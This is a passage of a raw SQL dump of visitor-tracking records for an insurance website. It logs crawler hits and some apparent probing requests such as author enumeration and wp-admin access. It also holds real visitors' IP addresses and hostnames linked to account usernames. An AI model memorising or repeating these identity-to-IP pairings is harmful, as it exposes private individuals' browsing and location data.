+http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5309,'0b_2b653d297989c4a9c9f1a67c42e90dae','1458093082','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5312,'0b_4931cedfdb6b8382341b01c8904be6e7','1458093085','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5315,'0b_2683674f1b44719225c7e88bb30ae604','1458094802','66.249.73.169','crawl-66-249-73-169.googlebot.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5318,'0b_de2c3c828dc504ebc8850e8aed5c2713','1458095991','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5319,'0b_1e6ddce2a37f0df8c5a60c85dc2b1352','1458097268','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5321,'0b_143ca8f5a353dcbdf0ce61db4a3ae84c','1458101609','180.76.15.11','baiduspider-180-76-15-11.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(5322,'0b_a530f1310da4e3759d7d3e083a35a821','1458102641','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(5325,'0b_11bbff4af74f3aea2e2b6d6e4dba5d37','1458103978','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(5328,'0b_11bbff4af74f3aea2e2b6d6e4dba5d37','1458103990','69.30.213.82','69.30.213.82','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5330,'0b_11bbff4af74f3aea2e2b6d6e4dba5d37','1458104000','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5333,'0b_11bbff4af74f3aea2e2b6d6e4dba5d37','1458104011','69.30.213.82','69.30.213.82','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5336,'0b_11bbff4af74f3aea2e2b6d6e4dba5d37','1458104023','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5339,'0b_77b045835e083c6539f1624497a3b68d','1458104061','52.37.2.45','ec2-52-37-2-45.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5340,'0b_1d7372a3d164c820c060e2d4f99c193c','1458104078','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5342,'0b_6a055002aaea9d13ccf559d4cc990f76','1458104079','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(5343,'0b_77b045835e083c6539f1624497a3b68d','1458104091','52.37.2.45','ec2-52-37-2-45.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5346,'0b_77b045835e083c6539f1624497a3b68d','1458104154','52.37.2.45','ec2-52-37-2-45.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5349,'0b_77b045835e083c6539f1624497a3b68d','1458104156','52.37.2.45','ec2-52-37-2-45.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5351,'0b_73bf6e1ab8b2ab6927e20c1abda59577','1458106059','66.249.73.202','crawl-66-249-73-202.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(5354,'0b_855b29ede0e9d49aecca936d9c723b8a','1458106072','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(5357,'0b_e164a52c0d1147db54b250899f704583','1458107241','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5358,'0b_670cb5f75379b0baf900e195bd9bce7c','1458109232','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(5360,'0b_eb0e40567a1328865561bb7c094acf56','1458110536','104.236.60.129','104.236.60.129','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(5361,'0b_eb0e40567a1328865561bb7c094acf56','1458110547','104.236.60.129','104.236.60.129','/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(5363,'0b_eb0e40567a1328865561bb7c094acf56','1458110562','104.236.60.129','104.236.60.129','/igo/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5366,'0b_eb0e40567a1328865561bb7c094acf56','1458110575','104.236.60.129','104.236.60.129','/forms/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5367,'0b_eb0e40567a1328865561bb7c094acf56','1458110586','104.236.60.129','104.236.60.129','/contact/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5370,'0b_eb0e40567a1328865561bb7c094acf56','1458110597','104.236.60.129','104.236.60.129','/about-us/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5373,'0b_eb0e40567a1328865561bb7c094acf56','1458110607','104.236.60.129','104.236.60.129','/carriers/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5376,'0b_eb0e40567a1328865561bb7c094acf56','1458110618','104.236.60.129','104.236.60.129','/register/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5379,'0b_eb0e40567a1328865561bb7c094acf56','1458110629','104.236.60.129','104.236.60.129','/insentives/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5382,'0b_eb0e40567a1328865561bb7c094acf56','1458110640','104.236.60.129','104.236.60.129','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(5385,'0b_eb0e40567a1328865561bb7c094acf56','1458110650','104.236.60.129','104.236.60.129','/case-status/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5387,'0b_eb0e40567a1328865561bb7c094acf56','1458110661','104.236.60.129','104.236.60.129','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5388,'0b_eb0e40567a1328865561bb7c094acf56','1458110672','104.236.60.129','104.236.60.129','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5390,'0b_eb0e40567a1328865561bb7c094acf56','1458110682','104.236.60.129','104.236.60.129','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5391,'0b_eb0e40567a1328865561bb7c094acf56','1458110694','104.236.60.129','104.236.60.129','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(5393,'0b_eb0e40567a1328865561bb7c094acf56','1458110704','104.236.60.129','104.236.60.129','/members/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(5394,'0b_eb0e40567a1328865561bb7c094acf56','1458110715','104.236.60.129','104.236.60.129','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(5396,'0b_eb0e40567a1328865561bb7c094acf56','1458110726','104.236.60.129','104.236.60.129','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(5397,'0b_eb0e40567a1328865561bb7c094acf56','1458110737','104.236.60.129','104.236.60.129','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5399,'0b_eb0e40567a1328865561bb7c094acf56','1458110747','104.236.60.129','104.236.60.129','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5402,'0b_eb0e40567a1328865561bb7c094acf56','1458110758','104.236.60.129','104.236.60.129','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5405,'0b_eb0e40567a1328865561bb7c094acf56','1458110769','104.236.60.129','104.236.60.129','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(5408,'0b_6e8bfcdf1756cc5d3f6ce6f0874b55eb','1458112047','122.200.17.72','122.200.17.72','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.co.in/','_notprovided_',1,'WinVista','Chrome 48','in','','Google IN','','','','','0','0',0),(5411,'0b_8d7de97ff40fed6b2da743d8300c16c8','1458112167','213.111.197.81','81.197-pool.nikopol.net','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36','http://empireins.com/?author=1','',0,'Win7','Chrome 31','ru','','','','','','','0','0',0),(5412,'0b_6cfcd21534b47d47df975fce71eccd37','1458112513','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5414,'0b_548c4e4d5346fdf073931c1cb6da879b','1458113921','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5417,'0b_9082e555e4a6160111ed520af57f4b31','1458113921','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5418,'0b_3c79f81602e2191e0c689a430bdf900d','1458116921','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5420,'0b_b45fae5e456ad1291251881c46eabcc4','1458119130','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5423,'0b_c77763c911535866184301409dda4903','1458119850','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5424,'0b_eb9cc1290ddbd58467cef9b3473d0ad2','1458125618','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5427,'0b_1068259af867809fd02e79c574fd0fae','1458130932','46.246.29.159','46.246.29.159','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(5430,'0b_9aaa04ec770eb5ba221af66b2fd9ce0b','1458134107','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5433,'0b_9aaa04ec770eb5ba221af66b2fd9ce0b','1458134108','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5436,'0b_0584b3ef14b239f2c7a32ddb83faaec6','1458134118','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5439,'0b_0584b3ef14b239f2c7a32ddb83faaec6','1458134119','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5441,'0b_e82fe175420f28032458b330bc247b38','1458135688','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(5444,'0b_e82fe175420f28032458b330bc247b38','1458135701','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(5447,'0b_e82fe175420f28032458b330bc247b38','1458135913','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(5450,'0b_e82fe175420f28032458b330bc247b38','1458135954','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(5453,'0b_09369f59225c082914e2b52ef348b801','1458136975','66.249.83.246,12.158.108.226','12.158.108.226','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5456,'0b_35e05301c37361546ce516e2d409afdb','1458137401','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(5457,'0b_b8491822b26a8731c189f10eb7b7273f','1458137792','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5459,'0b_cc732d9546c427454afbd95fd5a3987c','1458139083','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5462,'0b_eee4c13c7f83ecbdd0338ca2ef32c435','1458139364','172.13.80.81','172-13-80-81.lightspeed.irvnca.sbcglobal.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinXP','Chrome 49','us','','Google','','','','','0','0',0),(5465,'0b_eee4c13c7f83ecbdd0338ca2ef32c435','1458139366','172.13.80.81','172-13-80-81.lightspeed.irvnca.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'WinXP','Chrome 49','us','','','','','','','0','0',0),(5468,'0b_3d38202d3621baab062c0fe6abccc76c','1458140512','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5469,'0b_3d38202d3621baab062c0fe6abccc76c','1458140516','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5472,'0b_3d38202d3621baab062c0fe6abccc76c','1458140520','69.175.67.58','newscan04.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5475,'0b_3d38202d3621baab062c0fe6abccc76c','1458140523','69.175.67.58','newscan04.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5477,'0b_3d38202d3621baab062c0fe6abccc76c','1458140525','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5478,'0b_3d38202d3621baab062c0fe6abccc76c','1458140527','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5481,'0b_e6ed121546e321abca0ef3d47c611bd5','1458141029','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5483,'0b_903f2547a72864dabbb10226aaed5d87','1458141107','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5486,'0b_c74ec47e68d3cd2e8ab70828a1f00e39','1458142090','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(5487,'0b_e82fe175420f28032458b330bc247b38','1458142354','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(5490,'0b_e82fe175420f28032458b330bc247b38','1458142355','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(5492,'0b_e82fe175420f28032458b330bc247b38','1458142364','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(5493,'0b_e82fe175420f28032458b330bc247b38','1458142376','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(5496,'0b_9ae9cf79eadb89a49b12e7ca1b85a2c8','1458142634','180.76.15.138','baiduspider-180-76-15-138.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(5499,'0b_a31c93c34ca645cf2cb061c16579739c','1458142761','141.8.143.235','spider-141-8-143-235.yandex.com','/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5502,'0b_6c46296bf1f4f7b12b616d2369095ebf','1458142976','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5505,'0b_9ebdfc14e4c4c396718bcd5fe44c2b14','1458143562','108.58.164.26','ool-6c3aa41a.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1463 x 823','','','','','','0','0',0),(5507,'0b_9ebdfc14e4c4c396718bcd5fe44c2b14','1458143564','108.58.164.26','ool-6c3aa41a.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1463 x 823','','','','','','0','0',0),(5508,'0b_9ebdfc14e4c4c396718bcd5fe44c2b14','1458143578','108.58.164.26','ool-6c3aa41a.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1463 x 823','','','','','','0','0',0),(5511,'0b_ef435a6ad6eecae90c40b1df5e33891a','1458143625','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5514,'0b_ef435a6ad6eecae90c40b1df5e33891a','1458143627','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5516,'0b_4a8b5b404786a72299f3603c584efb67','1458144190','108.58.164.26','ool-6c3aa41a.static.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','3','0',0),(5517,'0b_4a8b5b404786a72299f3603c584efb67','1458144192','108.58.164.26','ool-6c3aa41a.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','3','0',0),(5519,'0b_a1777378a0f2c74bc373638b4052696e','1458144202','108.58.164.26','ool-6c3aa41a.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/members/','',0,'Win8','Chrome 49','us','1280 x 720','','','','fntime55','','0','0',0),(5520,'0b_a1777378a0f2c74bc373638b4052696e','1458144343','108.58.164.26','ool-6c3aa41a.static.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/members/','',0,'Win8','Chrome 49','us','1280 x 720','','','','fntime55','','0','51',0),(5523,'0b_b318e60d7a5c3f11d32fc93b2b20fcdc','1458144582','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(5525,'0b_b318e60d7a5c3f11d32fc93b2b20fcdc','1458144585','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(5528,'0b_606ee6cf87e41655a9b292fcaeed261c','1458145631','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5529,'0b_9a0061dc1104bc830c8e3168da4bb4dd','1458145709','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) 